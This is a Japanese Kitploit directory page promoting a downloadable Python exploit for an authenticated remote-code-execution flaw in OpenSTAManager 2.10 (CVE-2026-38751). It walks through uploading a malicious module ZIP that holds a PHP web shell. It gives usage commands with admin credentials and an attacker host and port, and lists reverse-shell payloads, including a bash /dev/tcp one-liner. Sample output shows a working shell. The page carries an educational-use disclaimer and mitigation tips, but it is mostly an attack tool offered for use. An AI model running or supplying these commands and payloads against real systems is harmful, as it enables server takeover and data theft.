Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — OpenSTAManager RCE エクスプロイト (CVE-2026-38751) | Kitploit
ツール/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールシェルコード生成
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE エクスプロイト (CVE-2026-38751)

リポジトリを見る
152ヶ月前未レビュー

OpenSTAManager RCE エクスプロイト (CVE-2026-38751)

概要

このPythonスクリプトは、CVE-2026-38751として識別されたOpenSTAManagerバージョン2.10のリモートコード実行の脆弱性を悪用します。このエクスプロイトにより、認証されたユーザーは悪意のあるモジュールをアップロードし、ターゲットシステム上で任意のコマンドを実行できます。

脆弱性詳細

  • CVE ID: CVE-2026-38751
  • 製品: OpenSTAManager
  • バージョン: 2.10
  • タイプ: リモートコード実行 (RCE)
  • 攻撃ベクトル: Webベース、有効な認証が必要

エクスプロイトの仕組み

エクスプロイトは以下の手順で動作します:

  1. 認証: 提供された認証情報を使用してOpenSTAManagerアプリケーションにログインします
  2. アップデートの有効化: エクスプロイトに必要なモジュール更新機能を有効化します
  3. 悪意のあるZIPの作成: 以下の内容を含むZIPファイルを生成します:
    • モジュール定義ファイル (MODULE)
    • GETパラメータ c を介してコマンドを実行するPHPシェルスクリプト (shell.php)
  4. モジュールのアップロード: モジュール更新インターフェースを通じて悪意のあるZIPをアップロードします
  5. エクスプロイトの検証: シェルがアクセス可能で機能することを確認します
  6. コマンドの実行: 以下のいずれか:
    • 手動コマンド実行のための対話型シェルモード
    • 永続的な接続を確立するリバースシェル接続

前提条件

  • Python 3.x
  • 必要なPythonパッケージ: requests, zipfile
  • OpenSTAManagerの有効な管理者認証情報
  • ターゲットシステムへのネットワークアクセス

使用方法

基本的な使用方法

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password

対話型シェルモード

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --interactive

リバースシェルモード

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444

引数

技術的詳細

エクスプロイトプロセス

  1. 認証: スクリプトはアプリケーションの認証エンドポイントにログインリクエストを送信します
  2. モジュール更新の有効化: モジュール更新機能を有効にするためにPOSTリクエストを送信します
  3. ZIPの生成: 以下の内容でZIPアーカイブを作成します:
    • shell/MODULE: モジュール設定ファイル
    • shell/shell.php: GETパラメータ c で渡されたコマンドを実行するPHPウェブシェル
  4. アップロードプロセス: マルチパートフォームデータを使用して、悪意のあるZIPをモジュール更新エンドポイントにアップロードします
  5. 検証: idのような簡単なコマンドを実行してアップロードしたシェルが動作していることを確認します
  6. コマンド実行: 対話型シェルを提供するか、リバースシェル接続を確立します

使用されるペイロード

エクスプロイトは複数のリバースシェルペイロードを試みます:

  • Bashリバースシェル: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
  • Pythonソケットを使用したリバースシェル
  • Base64エンコードされたbashペイロード
  • Netcatリバースシェル

セキュリティ上の考慮事項

⚠️ 免責事項: このエクスプロイトは教育目的および許可されたセキュリティテスト目的のみに使用することを意図しています。

リスク評価

この脆弱性により以下が可能になります:

  • Webサーバーユーザーとしての任意のコード実行
  • 権限昇格の可能性
  • システムに保存された機密データへのアクセス
  • ネットワーク内でのラテラルムーブメントの可能性

緩和策

この脆弱性から保護するには:

  1. OpenSTAManagerを最新バージョンに更新する
  2. 適切な認証制御を実装する
  3. ファイルアップロード機能を制限する
  4. 不審なアクティビティを監視する
  5. ネットワークセグメンテーションを適用する

出力例

root@kitploit:~
[ OpenSTAManager RCE Exploit : ]

ターゲット: http://target.com
[*] ステップ 1: ログイン中...
[+] ログイン成功: admin
[*] ステップ 2: アップデート有効化中...
[+] アップデート有効化
[*] ステップ 3: ZIP作成中...
[*] メモリ内ZIPファイルを作成しました
[*] シェル位置: /modules/shell/shell.php
[*] ステップ 4: アップロード中...
[*] アップロードステータス: 200
[+] アップロード成功
[*] ステップ 5: 検証中...
[+] 脆弱性確認完了!
[+] シェル: http://target.com/modules/shell/shell.php
[+] テスト: http://target.com/modules/shell/shell.php?c=whoami

[*] 対話型モードに入ります...
cmd> whoami
www-data
cmd> exit

参考文献

  • GitHub リポジトリ
  • CVE 詳細

ライセンス

このエクスプロイトは教育目的のみで提供されています。あなたが所有していない、または明示的なテスト許可を得ていないシステムに対する無許可の使用は違法です。

ツールをダウンロード
引数説明
-u, --urlターゲットURL(必須)
-U, --user認証用ユーザー名(必須)
-P, --password認証用パスワード(必須)
--interactive対話型シェルモードに入る
--no-cleanup実行後にシェルファイルを削除しない
--lhostリバースシェル用のローカルホスト
--lportリバースシェル用のローカルポート